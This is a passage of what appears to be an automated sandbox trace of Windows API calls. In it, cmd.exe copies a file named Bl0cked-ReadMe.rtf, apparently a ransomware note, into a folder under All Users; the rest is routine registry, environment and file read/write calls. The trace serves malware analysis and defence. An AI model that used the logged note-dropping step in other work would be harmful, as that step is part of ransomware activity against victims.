returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x9, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x9, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x9, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegCloseKey (hKey=0x40) returned 0x0 [0147.354] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886375 [0147.354] srand (_Seed=0x5b886375) [0147.354] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"" [0147.354] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"" [0147.355] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.355] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0147.355] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.355] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.355] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.355] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.355] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.355] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.355] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.355] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.355] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.355] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.355] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.355] GetEnvironmentStringsW () returned 0x342318* [0147.355] FreeEnvironmentStringsW (penv=0x342318) returned 1 [0147.355] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.355] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.355] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.355] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.355] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.355] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.356] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.356] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.356] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.356] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.356] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f980 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.356] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f980, lpFilePart=0x14f97c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f97c*="Desktop") returned 0x18 [0147.356] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.356] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f6fc | out: lpFindFileData=0x14f6fc) returned 0x340058 [0147.356] FindClose (in: hFindFile=0x340058 | out: hFindFile=0x340058) returned 1 [0147.356] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f6fc | out: lpFindFileData=0x14f6fc) returned 0x340058 [0147.356] FindClose (in: hFindFile=0x340058 | out: hFindFile=0x340058) returned 1 [0147.356] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f6fc | out: lpFindFileData=0x14f6fc) returned 0x340058 [0147.356] FindClose (in: hFindFile=0x340058 | out: hFindFile=0x340058) returned 1 [0147.356] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.356] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0147.356] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0147.357] GetEnvironmentStringsW () returned 0x342b38* [0147.357] FreeEnvironmentStringsW (penv=0x342b38) returned 1 [0147.357] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.357] GetConsoleOutputCP () returned 0x1b5 [0147.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.357] GetUserDefaultLCID () returned 0x409 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x14fac0, cchData=128 | out: lpLCData="0") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fac0, cchData=128 | out: lpLCData="0") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fac0, cchData=128 | out: lpLCData="1") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0147.358] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0147.358] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0147.359] GetConsoleTitleW (in: lpConsoleTitle=0x330908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.359] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.359] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0147.359] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0147.359] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0147.360] _wcsicmp (_String1="type", _String2=")") returned 75 [0147.360] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0147.360] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0147.360] _wcsicmp (_String1="IF", _String2="type") returned -11 [0147.360] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0147.360] _wcsicmp (_String1="REM", _String2="type") returned -2 [0147.360] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0147.364] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.364] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.364] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.364] GetFileType (hFile=0x7) returned 0x2 [0147.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0147.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f9b8 | out: lpMode=0x14f9b8) returned 1 [0147.409] _dup (_FileHandle=1) returned 3 [0147.409] _close (_FileHandle=1) returned 0 [0147.409] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0147.409] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{11352~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14f988, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0147.411] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0147.411] GetConsoleTitleW (in: lpConsoleTitle=0x14f7b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.411] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0147.411] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0147.411] _wcsicmp (_String1="type", _String2="DEL") 
returned 16 [0147.411] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0147.412] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.412] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x14f31c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f31c) returned 0x330ec0 [0147.413] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0147.413] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0147.413] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0147.413] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e228, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0147.413] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0147.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.413] GetFileType (hFile=0x54) returned 0x1 [0147.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.413] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14e280 | out: lpFileSizeHigh=0x14e280*=0x0) returned 0x1632 [0147.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.413] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.413] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.419] _get_osfhandle (_FileHandle=1) 
returned 0x4c [0147.419] GetFileType (hFile=0x4c) returned 0x1 [0147.419] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.419] GetFileType (hFile=0x4c) returned 0x1 [0147.419] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.419] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, 
lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.421] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.421] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.422] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.422] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] GetFileType (hFile=0x4c) returned 0x1 [0147.422] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.422] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, 
nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.423] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.423] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.423] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.423] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.425] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.425] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 
[0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, 
lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.426] SetFilePointerEx (in: hFile=0x54, 